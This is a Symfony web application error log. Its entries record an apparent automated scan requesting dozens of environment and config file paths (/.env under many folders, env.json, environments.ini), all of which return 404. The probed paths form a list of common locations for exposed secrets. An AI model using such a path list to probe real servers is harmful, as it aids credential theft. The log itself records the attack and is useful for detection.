[2025-12-20 20:51:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /develop/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /develop/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:51:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /developer/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /developer/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:51:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /development/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /development/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:51:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /env.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /env.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:51:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /env.rb"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /env.rb\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:51:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /env.yaml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /env.yaml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:51:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /erp/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /erp/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:51:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /fe/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /fe/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:52:08] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /front/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /front/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:52:11] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-20 20:52:12] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /frontend/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /frontend/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:52:20] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /kyc/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /kyc/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:52:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /laravel/core/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /laravel/core/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:52:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /lib/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /lib/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:52:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /live/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /live/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:52:59] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /live_env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /live_env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:53:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /lms/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /lms/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:53:11] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /local/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /local/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:53:27] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /mailer/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /mailer/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:53:37] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /market/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /market/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:53:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /marketing/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /marketing/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:53:49] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /media/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /media/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:53:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /new/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /new/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:53:59] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /node-api/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /node-api/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:54:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /node/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /node/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:54:08] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /node/api/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /node/api/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:54:22] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /nodeapi/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /nodeapi/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:54:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /nodeweb/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /nodeweb/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:54:30] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /old/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /old/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:54:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /portal/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /portal/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:54:46] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /private/env.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /private/env.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:54:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /product/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /product/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:54:59] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /production/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /production/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:55:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /project/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /project/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:55:07] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /public-api/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /public-api/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:55:12] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /public/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /public/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:55:15] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /public_html/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /public_html/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:55:18] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /qa/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /qa/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:55:21] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /server/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /server/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:55:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /server/api/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /server/api/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:55:30] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /server/backend/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /server/backend/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:55:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:56:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /services/environments.ini"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /services/environments.ini\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:56:08] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /shared/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /shared/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:56:11] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /shop/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /shop/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
